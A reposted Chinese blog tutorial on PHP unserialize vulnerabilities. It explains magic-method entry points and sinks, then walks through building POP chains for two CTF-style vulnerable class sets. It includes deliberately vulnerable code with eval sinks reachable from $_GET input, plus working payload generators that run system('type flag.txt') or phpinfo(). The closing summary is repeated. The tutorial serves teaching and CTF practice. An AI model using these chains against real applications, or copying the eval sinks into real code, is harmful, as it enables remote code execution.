转自: PHP反序列化-CSDN博客
反序列化漏洞是基于序列化和反序列化的操作,在反序列化——unserialize()时存在用户可控参数,而反序列化会自动调用一些魔术方法,如果魔术方法内存在一些敏感操作例如eval()函数,而且参数是通过反序列化产生的,那么用户就可以通过改变参数来执行敏感操作,这就是反序列化漏洞。
方法论:起点(魔法函数),终点(执行、危险函数),跳板
1、反序列化的常见起点:
(1)__wakeup 一定会调用
(2)__destruct 一定会调用
(3)__toString 当一个对象被反序列化后又被当做字符串使用
2、反序列化的常见中间跳板:
(1)__toString 当一个对象被当做字符串使用
(2)__get 读取不可访问或不存在属性时被调用
(3)__set 当给不可访问或不存在属性赋值时被调用
(4)__isset 对不可访问或不存在的属性调用isset()或empty()时被调用,形如 t h i s − > this-> this−>func();
(5)__call 调用不可访问或不存在的方法时被调用
3、反序列化的常见终点:
(1)call_user_func 一般php代码执行都会选择这里
(2)call_user_func_array 一般php代码执行都会选择这里
(3)执行指令、文件操作、执行代码等敏感操作
<?php
class kaiser {
var $a;
function __construct() {
$this->a = new Test();
}
function __destruct() {
$this->a->hello();
}
}
class Test {
function hello() {
echo "Hello World.";
}
}
class Vul {
var $data;
function hello() {
@eval($this->data);
}
}
$k = new kaiser();
$v = new Vul();
$k->a = $v;
$v->data = 'system("type flag.txt");';
$c = serialize($k);
echo $c;
#如果使用private定义 poc则需要url编码
$d=urlencode($c);
unserialize($c);
?>
我的做题思路可能有问题,都是在源代码上修改,可以简化为:
class kaiser {
private $a;
function __construct() {
$this->a = new Vul();
}
}
class Vul {
protected $data = "phpinfo();";
}
echo urlencode(serialize(new kaiser()));
//********************************************??????????????/
复杂一点的例子:
<?php
class Tiger{
public $string;
protected $var;
public function __toString(){
return $this->string;
}
public function boss($value){
@eval($value);
}
public function __invoke(){
$this->boss($this->var);
}
}
class Lion{
public $tail;
public function __construct(){
$this->tail = array();
}
public function __get($value){
$function = $this->tail;
return $function();
}
}
class Monkey{
public $head;
public $hand;
public function __construct($here="Zoo"){
$this->head = $here;
echo "Welcome to ".$this->head."<br>";
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->head)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Elephant{
public $nose;
public $nice;
public function __construct($nice="nice"){
$this->nice = $nice;
echo $nice;
}
public function __toString(){
return $this->nice->nose;
}
}
if(isset($_GET['zoo'])){
@unserialize($_GET['zoo']);
}
else{
$a = new Monkey;
echo "Hello PHP!";
}
?>
POP调用链分析
1、确定终点
经过详细分析,目标调用存在于Tiger类的boss方法中,只要能够构造出boss方法的参数值为一条序列化字符串的PHP代码,即可完成。
2、寻找起点
通常反序列化过程中,必然会被自动调用的是__wakeup 和 __destruct 两个魔术方法,所以寻找上述代码中的起点,发现只有在Monkey类中存在__wakeup,那么就暂时先以Monkey类作为起点,进行反序列化操作,但是是否能达到终点并不完全确定,如果最终无法到达终点,那么我们就必须要继续寻找新的起点,或者是评估调用链是否正确。
3、确定$this->head
在Monkey类的__wakeup魔术方法中,使用了preg_match函数进行正则匹配,也就意味着第二个参数 $this->head 必须是一个字符串。从Monkey类中可以看到,$this->head的值可以来源于构造方法,默认值为 Zoo,但是这样使用显然不可能,因为反序列化的时候,是不会调用构造方法的。那么所以只能换一个方向来思考,$this->head如果是一个对象呢,当把一个对象当成字符串处理时,会触发__toString魔术方法,这条路也许可行。
4、确定__toString所在类
现在有两个对象有tostring方法,分别是Elephant和Tiger,选择哪个呢,我们的目的是进入boss函数执行命令,可以看到Tiger的tostring方法只是返回一个变量没啥用,所以就选择让$this->head = new Elephant();,此时会执行$this->nice->nose;
5、确定$this->nice
在Elephant的构造方法中,也存在对$nice的赋值,但是这类操作并没有实际价值,因为我们的目标是要想办法进行跳转,要一步一步跳转到别的类当中去执行代码,进而最终到达终点。目前还剩下Tiger的__invoke和Lion的__get没有进行跳转和调用,那么首先需要知道这两个魔术方法的触发条件:
(1)__invoke:当以函数方式调用对象时被调用,也就是类似:$a = new A(); $a();这种调用方式时触发
(2)__get:读取不可访问或不存在属性时被调用
那么我们来分析一下,$this->nice为哪个对象时,可以继续往下走。显然,此处不可能有条件能够触发到__invoke,那么只能选择触发__get,于是令$this->nice = new Lion(),而Lion类并没有属性nose,所以完成对Lion类的__get的触发
6、确定$this->tail
当跳转到Lion类的__get方法时,此时我们看到两个特征,第一:在返回一个函数,那么这很有可能为下一步准备以函数方式调用对象做了铺垫,即可以触发Tiger类的__invoke方法,目前看起来也许前面的POP正确性比较高。第二:需要确定$this->tail的值,那么按照这个设计来看的话,此处应该令$this->tail = new Tiger(); 是很有可能正确的。这个时候$function就是Tiger对象,而下一步的代码return $function();恰好可以印证这一点,实现了对象的函数式调用,进而触发Tiger类的__invoke魔术方法。
7、确定$this->var
进到Tiger类的__invoke魔术方法中时,直接看到了调用$this->boss()方法,已经快到终点了,所以此时,只需要确定$this->var的值便可以完成调用链的构造了,此时问题变简单了,只需要令$this->var = phpinfo();即可完成构造。
8、以终为始
上述分析过程,是以起点开始的,而往往起点通向终点的过程并不一定非常顺利,所以也可以将分析过程反过来,以终点开始,逐步推向起点,效率也许会更高。如果倒推,顺推都是一条路径,那么足以说明POP链是完全正确的。
——————
class Tiger{
public $string;
protected $var = "phpinfo();";
}
class Lion{
public $tail;
function __construct() {
$this->tail = new Tiger();
}
}
class Elephant {
public $nose;
public $nice;
function __construct()
{
$this->nice = new Lion();
}
}
class Monkey{
public $head;
function __construct()
{
$this->head = new Elephant();
}
}
$m = new Monkey();
echo urlencode(serialize($m));
总结
(1)先要确定起点和终点,如果起点有多个,那么就去尝试最有可能进行相互跳转的一个,起点和终点无法确定,POP链不可能成功。
(2)一定要牢记不同的魔术方法的自动触发条件,如果不太熟悉,则做实验证明,然后理解它。
(3)自动触发的跳转过程,会不停地给类变量(属性)赋值,一定要知道该赋什么样的值,通常的值都不会是普通类型,而是对象。
(4)POP链的分析和构造过程,可以完全忽略非魔术方法或也链条无关的方法和属性。
(5)POP的核心在于属性,而不是方法,序列化和反序列化的核心也在属性,而不是方法,所以方法对我们构造POC是无意义的。总结
(1)先要确定起点和终点,如果起点有多个,那么就去尝试最有可能进行相互跳转的一个,起点和终点无法确定,POP链不可能成功。
(2)一定要牢记不同的魔术方法的自动触发条件,如果不太熟悉,则做实验证明,然后理解它。
(3)自动触发的跳转过程,会不停地给类变量(属性)赋值,一定要知道该赋什么样的值,通常的值都不会是普通类型,而是对象。
(4)POP链的分析和构造过程,可以完全忽略非魔术方法或也链条无关的方法和属性。
(5)POP的核心在于属性,而不是方法,序列化和反序列化的核心也在属性,而不是方法,所以方法对我们构造POC是无意义的。
————————————————
标签:__,web,php,function,调用,序列化,public,nice From: https://blog.csdn.net/mails2008/article/details/140511901